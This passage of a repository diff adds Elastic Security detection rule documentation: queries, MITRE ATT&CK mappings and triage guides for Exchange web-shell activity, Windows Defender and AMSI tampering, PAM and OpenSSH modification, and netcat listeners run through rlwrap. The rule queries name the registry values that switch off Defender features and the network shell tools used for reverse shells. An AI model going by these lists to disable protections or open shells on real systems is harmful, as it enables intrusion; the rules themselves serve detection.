Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-worker-spawning-suspicious-processes.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-worker-spawning-suspicious-processes.asciidoc new file mode 100644 index 0000000000..f4e39a6551 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-worker-spawning-suspicious-processes.asciidoc @@ -0,0 +1,95 @@ +[[prebuilt-rule-8-10-5-microsoft-exchange-worker-spawning-suspicious-processes]] +=== Microsoft Exchange Worker Spawning Suspicious Processes + +Identifies suspicious processes being spawned by the Microsoft Exchange Server worker process (w3wp). This activity may indicate exploitation activity or access to an existing web shell backdoor. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers +* https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities +* https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "w3wp.exe" and process.parent.args : "MSExchange*AppPool" and + (process.name : ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe") or + process.pe.original_file_name in ("cmd.exe", "powershell.exe", "pwsh.dll", "powershell_ise.exe")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-windows-defender-tampering.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-windows-defender-tampering.asciidoc new file mode 100644 index 0000000000..b343e44723 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-windows-defender-tampering.asciidoc @@ -0,0 +1,146 @@ +[[prebuilt-rule-8-10-5-microsoft-windows-defender-tampering]] +=== Microsoft Windows Defender Tampering + +Identifies when one or more features on Microsoft Defender are disabled. Adversaries may disable or tamper with Microsoft Defender features to evade detection and conceal malicious behavior. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ +* https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html +* https://www.tenforums.com/tutorials/104025-turn-off-core-isolation-memory-integrity-windows-10-a.html +* https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html +* https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html +* https://www.tenforums.com/tutorials/51514-turn-off-microsoft-defender-periodic-scanning-windows-10-a.html +* https://www.tenforums.com/tutorials/3569-turn-off-real-time-protection-microsoft-defender-antivirus.html +* https://www.tenforums.com/tutorials/99576-how-schedule-scan-microsoft-defender-antivirus-windows-10-a.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Microsoft Windows Defender Tampering + +Microsoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks. + +This rule monitors the registry for modifications that disable Windows Defender features. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine which features have been disabled, and check if this operation is done under change management and approved according to the organization's policy. + +### False positive analysis + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed. + +### Related rules + +- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb +- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Take actions to restore the appropriate Windows Defender antivirus configurations. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Review the privileges assigned to the user to ensure that the least privilege principle is being followed. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type in ("creation", "change") and + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\PUAProtection" and + registry.data.strings : ("0", "0x00000000")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\\DisallowExploitProtectionOverride" and + registry.data.strings : ("0", "0x00000000")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware" and + registry.data.strings : ("1", "0x00000001")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Features\\TamperProtection" and + registry.data.strings : ("0", "0x00000000")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring" and + registry.data.strings : ("1", "0x00000001")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIntrusionPreventionSystem" and + registry.data.strings : ("1", "0x00000001")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableScriptScanning" and + registry.data.strings : ("1", "0x00000001")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\EnableControlledFolderAccess" and + registry.data.strings : ("0", "0x00000000")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection" and + registry.data.strings : ("1", "0x00000001")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Reporting\\DisableEnhancedNotifications" and + registry.data.strings : ("1", "0x00000001")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\SpyNet\\DisableBlockAtFirstSeen" and + registry.data.strings : ("1", "0x00000001")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\SpyNet\\SpynetReporting" and + registry.data.strings : ("0", "0x00000000")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\SpyNet\\SubmitSamplesConsent" and + registry.data.strings : ("0", "0x00000000")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring" and + registry.data.strings : ("1", "0x00000001")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-amsienable-registry-key.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-amsienable-registry-key.asciidoc new file mode 100644 index 0000000000..9ef0b60fb6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-amsienable-registry-key.asciidoc @@ -0,0 +1,137 @@ +[[prebuilt-rule-8-10-5-modification-of-amsienable-registry-key]] +=== Modification of AmsiEnable Registry Key + +Identifies modifications of the AmsiEnable registry key to 0, which disables the Antimalware Scan Interface (AMSI). An adversary can modify this key to disable AMSI protections. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://hackinparis.com/data/slides/2019/talks/HIP2019-Dominic_Chell-Cracking_The_Perimeter_With_Sharpshooter.pdf +* https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Modification of AmsiEnable Registry Key + +The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell. + +Since AMSI is widely used across security products for increased visibility, attackers can disable it to evade detections that rely on it. + +This rule monitors the modifications to the Software\Microsoft\Windows Script\Settings\AmsiEnable registry key. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate the execution of scripts and macros after the registry modification. +- Retrieve scripts or Microsoft Office files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Use process name, command line, and file hash to search for occurrences on other hosts. + +### False positive analysis + +- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections. + +### Related rules + +- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Delete or set the key to its default value. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type in ("creation", "change") and + registry.path : ( + "HKEY_USERS\\*\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable", + "HKU\\*\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable", + "\\REGISTRY\\USER\\*\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable" + ) and + registry.data.strings: ("0", "0x00000000") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-dynamic-linker-preload-shared-object.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-dynamic-linker-preload-shared-object.asciidoc new file mode 100644 index 0000000000..5a74bcd863 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-dynamic-linker-preload-shared-object.asciidoc @@ -0,0 +1,69 @@ +[[prebuilt-rule-8-10-5-modification-of-dynamic-linker-preload-shared-object]] +=== Modification of Dynamic Linker Preload Shared Object + +Identifies modification of the dynamic linker preload shared object (ld.so.preload). Adversaries may execute malicious payloads by hijacking the dynamic linker used to load libraries. + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 207 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.category:file and event.action:(updated or renamed or rename) and +not event.type:deletion and file.path:/etc/ld.so.preload + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Dynamic Linker Hijacking +** ID: T1574.006 +** Reference URL: https://attack.mitre.org/techniques/T1574/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-openssh-binaries.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-openssh-binaries.asciidoc new file mode 100644 index 0000000000..201fd2ccad --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-openssh-binaries.asciidoc @@ -0,0 +1,101 @@ +[[prebuilt-rule-8-10-5-modification-of-openssh-binaries]] +=== Modification of OpenSSH Binaries + +Adversaries may modify SSH related binaries for persistence or credential access by patching sensitive functions to enable unauthorized access or by logging SSH credentials for exfiltration. + +*Rule type*: query + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.angelalonso.es/2016/09/anatomy-of-real-linux-intrusion-part-ii.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Persistence +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:file and host.os.type:linux and event.type:change and + process.name:(* and not (dnf or dnf-automatic or dpkg or yum or rpm or yum-cron or anacron)) and + (file.path:(/usr/bin/scp or + /usr/bin/sftp or + /usr/bin/ssh or + /usr/sbin/sshd) or + file.name:libkeyutils.so) and + not process.executable:/usr/share/elasticsearch/* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Modify Authentication Process +** ID: T1556 +** Reference URL: https://attack.mitre.org/techniques/T1556/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SSH +** ID: T1021.004 +** Reference URL: https://attack.mitre.org/techniques/T1021/004/ +* Technique: +** Name: Remote Service Session Hijacking +** ID: T1563 +** Reference URL: https://attack.mitre.org/techniques/T1563/ +* Sub-technique: +** Name: SSH Hijacking +** ID: T1563.001 +** Reference URL: https://attack.mitre.org/techniques/T1563/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-standard-authentication-module-or-configuration.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-standard-authentication-module-or-configuration.asciidoc new file mode 100644 index 0000000000..389dac1311 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-standard-authentication-module-or-configuration.asciidoc @@ -0,0 +1,101 @@ +[[prebuilt-rule-8-10-5-modification-of-standard-authentication-module-or-configuration]] +=== Modification of Standard Authentication Module or Configuration + +Adversaries may modify the standard authentication module for persistence via patching the normal authorization process or modifying the login configuration to allow unauthorized access or elevate privileges. + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/zephrax/linux-pam-backdoor +* https://github.com/eurialo/pambd +* http://0x90909090.blogspot.com/2016/06/creating-backdoor-in-pam-in-5-line-of.html +* https://www.trendmicro.com/en_us/research/19/i/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload.html + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Persistence +* Data Source: Elastic Defend + +*Version*: 204 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:file and event.type:change and + (file.name:pam_*.so or file.path:(/etc/pam.d/* or /private/etc/pam.d/* or /usr/lib64/security/*)) and + process.executable: + (* and + not + ( + /usr/libexec/packagekitd or + /usr/bin/vim or + /usr/libexec/xpcproxy or + /usr/bin/bsdtar or + /usr/local/bin/brew or + "/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service" + ) + ) and + not file.path: + ( + /tmp/snap.rootfs_*/pam_*.so or + /tmp/newroot/lib/*/pam_*.so or + /private/var/folders/*/T/com.apple.fileprovider.ArchiveService/TemporaryItems/*/lib/security/pam_*.so or + /tmp/newroot/usr/lib64/security/pam_*.so + ) and + not process.name: + ( + yum or dnf or rsync or platform-python or authconfig or rpm or pdkg or apk or dnf-automatic or btrfs or + dpkg or pam-auth-update or steam or platform-python3.6 or pam-config or microdnf or yum_install or yum-cron or + systemd or containerd or pacman + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Modify Authentication Process +** ID: T1556 +** Reference URL: https://attack.mitre.org/techniques/T1556/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-the-mspkiaccountcredentials.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-the-mspkiaccountcredentials.asciidoc new file mode 100644 index 0000000000..15d9aac73c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-the-mspkiaccountcredentials.asciidoc @@ -0,0 +1,76 @@ +[[prebuilt-rule-8-10-5-modification-of-the-mspkiaccountcredentials]] +=== Modification of the msPKIAccountCredentials + +Identify the modification of the msPKIAccountCredentials attribute in an Active Directory User Object. Attackers can abuse the credentials roaming feature to overwrite an arbitrary file for privilege escalation. ms-PKI-AccountCredentials contains binary large objects (BLOBs) of encrypted credential objects from the credential manager store, private keys, certificates, and certificate requests. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming +* https://social.technet.microsoft.com/wiki/contents/articles/11483.windows-credential-roaming.aspx +* https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Data Source: Active Directory +* Tactic: Privilege Escalation +* Use Case: Active Directory Monitoring + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.action:"Directory Service Changes" and event.code:"5136" and + winlog.event_data.AttributeLDAPDisplayName:"msPKIAccountCredentials" and winlog.event_data.OperationType:"%%14674" and + not winlog.event_data.SubjectUserSid : "S-1-5-18" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-namespace-manipulation-using-unshare.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-namespace-manipulation-using-unshare.asciidoc new file mode 100644 index 0000000000..76004c1cda --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-namespace-manipulation-using-unshare.asciidoc @@ -0,0 +1,68 @@ +[[prebuilt-rule-8-10-5-namespace-manipulation-using-unshare]] +=== Namespace Manipulation Using Unshare + +Identifies suspicious usage of unshare to manipulate system namespaces. Unshare can be utilized to escalate privileges or escape container security boundaries. Threat actors have utilized this binary to allow themselves to escape to the host and access other resources or escalate privileges. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://man7.org/linux/man-pages/man1/unshare.1.html +* https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action : ("exec", "exec_event") and +process.executable: "/usr/bin/unshare" and +not process.parent.executable: ("/usr/bin/udevadm", "*/lib/systemd/systemd-udevd", "/usr/bin/unshare") and +not process.args : "/usr/bin/snap" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-netcat-listener-established-via-rlwrap.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-netcat-listener-established-via-rlwrap.asciidoc new file mode 100644 index 0000000000..ffadfd809b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-netcat-listener-established-via-rlwrap.asciidoc @@ -0,0 +1,66 @@ +[[prebuilt-rule-8-10-5-netcat-listener-established-via-rlwrap]] +=== Netcat Listener Established via rlwrap + +Monitors for the execution of a netcat listener via rlwrap. rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. This utility can be used in conjunction with netcat to gain a more stable reverse shell. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name == "rlwrap" and process.args in ( + "nc", "ncat", "netcat", "nc.openbsd", "socat" +) and process.args : "*l*" and process.args_count >= 4 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-activity-detected-via-cat.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-activity-detected-via-cat.asciidoc new file mode 100644 index 0000000000..1413e104ed --- /dev/null +++ 